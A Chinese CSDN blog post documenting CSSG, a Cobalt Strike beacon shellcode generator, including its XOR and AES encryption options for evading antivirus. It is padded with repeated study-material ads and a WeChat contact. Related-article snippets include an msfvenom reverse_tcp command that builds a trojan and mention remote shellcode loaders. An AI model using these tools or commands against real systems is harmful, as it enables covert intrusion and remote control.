CSSG:Cobalt Strike Shellcode生成工具(2)

于 2024-05-16 09:39:08 发布
阅读量240 收藏 7
点赞数 5
分类专栏: 2024年程序员学习 文章标签: 网络安全 web安全 面试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_54846402/article/details/138945312
版权

一、网安学习成长路线图

网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
在这里插入图片描述

二、网安视频合集

观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
在这里插入图片描述

三、精品网安学习书籍

当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。
在这里插入图片描述

四、网络安全源码合集+工具包

光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这时候可以搞点实战案例来学习。
需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)

在这里插入图片描述

五、网络安全面试题

最后就是大家最关心的网络安全面试题板块
在这里插入图片描述在这里插入图片描述

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

执行要求
可选的AES加密选项使用/assets文件夹中的python脚本实现。
具体取决于要安装的pycryptodome包来执行AES加密。
在使用pip命令安装pycryptodome包时,具体取决于你的Python环境:
python -m pip install pycryptodome
python3 -m pip install pycryptodome
py -3 -m pip install pycryptodome
py -2 -m pip install pycryptodome
我们可以在pip安装执行完成之后检测pycryptodome包的安装情况,使用命令如下:
python -m pip list | grep crypto
生成器将会使用系统默认的“python”命令来启动AES加密脚本。

工具下载
广大研究人员可以使用下列命令将该项目源码克隆至本地并使用:
git clone https://github.com/RCStep/CSSG.git
Shellcode生成器选项
监听器:
使用"…"按钮选择一个有效的监听器。Shellcode将会根据选择的监听器来生成。

发送器:
无阶段(CSSG是一款不支持阶段操作的Shellcode生尘器)。

退出方法:
进程:当信标关闭之后,退出整个进程;
线程:当信标关闭之后,退出运行信标的线程;

本地Shellcode选项:
如果要从现有信标执行Shellcode,则可以使用该选项。
生成一个信标Shellcode Payload,该Payload可以从同一架构父信标继承关键函数指针。

现有会话:
Shellcode会将会话元数据提取至父Beacon会话中。
Shellcode将会在此信标会话中执行。

x86选项:
生成x86 Shellcode,默认生成x64 Shellcode。
使用Shellcode文件:
使用外部生成的原始Shellcode文件代替生成信标Shellcode。
这将允许我们使用以前导出的Shellcode文件或其他工具(Donut、msfvenom等)的输出。

格式化:
元数据 - Shellcode二进制源码输出,无格式化;
十六进制 - Shellcode十六进制格式输出;
0x90,0x90,0x90 - Shellcode C#风格字节数组输出;
\x90\x0\x90 - Shellcode C\C++风格字节数组输出;
b64 - Base64编码选项;
异或加密Shellcode:
勾选以对Shellcode进行异或加密。

异或密钥:
使用随机生成的或可编辑的异或密钥字符进行加密。
多个字符意味着多轮异或加密。

AES加密Shellcode:
勾选以启用对Shellcode的AES加密,加密类型可选。
使用一个Python脚本来执行AES分组密码AES-CBC加密。
Shellcode将会填充\0值来满足分组大小要求。
除此之外,工具还会在在加密的Shellcode数据前面加上一个随机生成的向量。

AES密钥:
用于加密的随机生成的可编辑AES密钥。
生成32字节的密钥,并优先用于256位加密强度。
接受的加密密钥字节长度为16、24和32位。

编码和压缩:
无编码/压缩 - 不对Shellcode进行编码和压缩。

还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!

王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。

对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!

【完整版领取方式在文末!!】

93道网络安全面试题

需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)

内容实在太多,不一一截图了

黑客学习资源推荐

最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

1️⃣零基础入门
① 学习路线

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

image

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供:

image-20231025112050764

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

m0_54846402
关注
专栏目录
红队系列-shellcode AV bypass Evasion免杀合集
aming小老弟
11-13 1425
壳就是软件所增加的保护,并不会破坏里面的程序结构,当我们运行这个加壳的程序时,系统首先会运行程序里的壳,然后由壳将加密的程序逐步还原到内存中,最后运行程序。加壳虽然对于特征码绕过有非常好的效果,加密壳基本上可以把特征码全部掩盖,但是缺点也非常的明显,因为壳自己也有特征,主流的壳如VMP, Themida等等。客户端上传特征,在云端无法检测到,则上传文件,文件通过杀软系统进行评判,得出总评分,对于无结果的,进行鉴定系统评分,总共得出结果返回给用户,并入云端库。比如可以远程读取png中的shellcode
shellcode_generator:shellcode生成器,Visual Studio,C ++,Windows
03-09
shellcode_generator shellcode生成器,Visual Studio,C ++,Windows
CSSG:Cobalt Strike Shellcode生成工具
weixin_43977912的博客
01-24 3669
CSSG CSSG是一款功能强大的Cobalt Strike Shellcode生成工具。本质上来说,CSSG是一个具备攻击性的Python脚本,广大研究人员可以使用它来轻松生成并格式化信标Shellcode。 该工具支持生成无阶段信标Shellcode,并带有暴露的退出方法、额外的格式化、加密、编码、压缩和多行输出等功能。 注意:Shellcode的转换通常需要按菜单顺序降序执行。 执行要求 可选的AES加密选项使用/assets文件夹中的python脚本实现。 具体取决于要安装的pycryptodome
我的Shellcode生成
http://www.cppx.net
03-11 1665
这个shellcode 生成器根据《网络渗透技术》中所带的示例改写,通过溢出堆栈缓冲区获得执行权限以后,将打开一个端口监听连接,创建一个新的进程运行cmd.exe,并把输入输出重定向到连接套接字,黑客通过客户端程序登录监听端口即可获得远程主机shell。/* shellcode_port_bind.c**  《网络渗透技术》演示程序*  作者:san, alert7, eyas, wate
Cobalt_strike生成shellcode分析
qq_41490873的博客
08-12 1595
005F33A0 FC cld //将标志寄存器Flag的方向标志位DF清零。在字串操作中使变址寄存器SI或DI的地址指针自动增加,字串处理由前往后 005F33A1 E8 89 00 00 00 call buf+8Fh (05F342F) 005F33A6 60 pushad 005F33A7 89 E5 mov ebp,esp 005F33A9 3
css-o-gram_tool:基于 CSSG 的多用途转换器
07-21
1. **网页设计**:在网页布局中,使用CSSG工具生成的图形可以提供更灵活的设计选项,同时保持页面轻量化。 2. **响应式设计**:由于CSS图形的矢量特性,它们可以自动适应不同屏幕尺寸,对于响应式网页设计特别有用...
contentful-ssg:将内容丰富的条目导出到文件系统(mdyaml),以获取静态站点生成器(hugogrow ...)
05-09
静态站点生成器的JvM内容导出 将内容丰富的条目导出到文件系统(md / yaml),以获取静态站点生成器(hugo / grow / ...) 入门 安装 npm i @jungvonmatt/contentful-ssg 指令 帮助 npx cssg help [command] 在里面 ...
Carolina-Closet-Static:卡罗莱纳州壁橱网站的静态部分
05-26
这是CSSG为Carolina Closet建立的静态网站 开发设置 安装 。 克隆此仓库。 cd进入克隆的目录并运行npm install 。 使用命令npm install -g gatsby-cli 运行gatsby develop命令以开发模式启动服务器。 在您的Web...
埃及信息学杂志:基于拓扑的文档特征选择方法
埃及信息学杂志19(2018)129全文基于拓扑的文档分类特征选择O.G. El Barbary,A.S.萨拉马埃及坦塔大学理学院数学系阿提奇莱因福奥文章历史记录:2017年6月11日收到2017年11月3日修订2018年1月5日接受在线提供2018年...
Golang的Cobalt Strike Shellcode Loader-Golang开发
05-26
Cobalt Strike Shellcode Loader by Golang Doge-Loader Cobalt Strike Shellcode Loader by Golang 本人github的项目可能目前主要分为两大类, :frog: Frog系列为自动化扫描方向, :dog_face: Doge系列为免杀及内网渗透方向 Doge-Loader为Doge系列中较为重要的项目 :dog_face: 本项目感谢朋友gd, skate_zhu的帮助 :dog_face: Doge-Loader 本项目主要作用为Cobalt Strikeshellcode加载器 项目结构如下: main.go 主程序,用于远程下载shellcode并加载(需要自行上传shellcode(bin文件)并且修改源码里的url等参数) xor.go 异或编码解码器 /enhancement 附加功能,主要用于免杀等(需自行在main.go中调用) /enhancement/copy.go 程序自删除与自复制 /enhancement/sandbox.go
一款开源的ShellCode生成引擎
11-29
1.本工具只支持x86 coff格式的文件 2.全局变量记得初始化,测试的时候发现有事全局变量没有初始化会获取不到 3.关闭MSVC的全局优化,开启全局优化时OBJ中的信息无法获取 4.不要在代码中使用c++一些特性,类似异常等,测试类时发现基本的类是可以满足的不要使用c++的一些库,切记
chiralium:Windows的Shellcode-to-binary生成
05-08
手性 描述 只是一个简单的工具,可以使用Golang从shellcode生成二进制文件。 当然,您需要能够“构建”。 您也可以指定自己的shellcode或使用msfvenom即时生成一个抄表器reverse_https(x86或x64)。 为了避免静态shellcode的检测,shellcode使用AES加密存储(每次编译都会生成唯一的随机密钥/ iv),然后存储在go文件中,然后在执行时进行编译和解密。 还创建了metasploit的资源文件,因为我太懒了,无法手动运行它。 我不相信任何东西,只是使用了来自许多地方的东西,例如。 目前,您可以: 仅编译Windows Shellcode 针对x86或x64体系结构进行编译 使用syscall执行您的shellcode 该程序已在Linux(Debian)和python3上进行了测试。 安装 所需组件: 高朗 python3
shellcode转换工具
07-26
shellcode转换工具
编写小型shellcode(writing small shellcode
08-16
这本书介绍了如何编写小型的windows shellcode
探索SimpleShellcode:一款轻巧实用的shellcode生成
gitblog_00003的博客
04-02 533
探索SimpleShellcode:一款轻巧实用的shellcode生成器 项目地址:https://gitcode.com/c1y2m3/SimpleShellcode网络安全领域,shellcode是一种特殊形式的机器代码,用于在目标系统上执行攻击者指定的操作。SimpleShellcode是一个简洁且易于使用的工具,它可以帮助开发者和安全研究人员快速生成自定义的shellcode。本文将...
ShellCode生成
Rare's Tech-Blog
08-19 6136
http://hi.baidu.com/olhack/blog/item/4eaad7b4132c15738ad4b2f6.html 黑防以前N多的文章已经介绍了ShellCode的编写,所以关于ShellCode的编写不是本文的目的。一般情况下,我们都是用汇编写好实现ShellCode功能的汇编代码,然后再提取16进制,那怎么提取呢?有人说用VC反汇编后,可以得到
简单的shellcode制作
renyizou的博客
06-16 251
一串机器能执行的代码 msfvenom msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.183.202 LPORT=4343 -f exe > 360.exe 生成一个名字叫360.exe的木马 此时还需要一个监听端--msf中的监听模块 use exploit/multi/handler 设置好lhost和lpost,记得设置payload,开启监听 运行木马 就能建立session,直接就进去了 linux ..
linux shellcode 生成,Linux shellcode sample
weixin_35955473的博客
05-15 108
Linux shellcode sampleHelloWorld.nasm;HelloWorld.asm;Author: Kul Subediglobal _startsection .text_start:; print HelloWorld! in screenmov eax, 0x4mov ebx, 0x1mov ecx, message;mov edx, 12mov edx, mlenin...
CSSG:Cobalt Strike Shellcode生成工具(1)
最新发布
05-16 455
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!除此之外,工具还会在在加密的Shellcode数据前面加上一个随机生成的向量。使用外部生成的原始Shellcode文件代替生成信标Shellcode
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值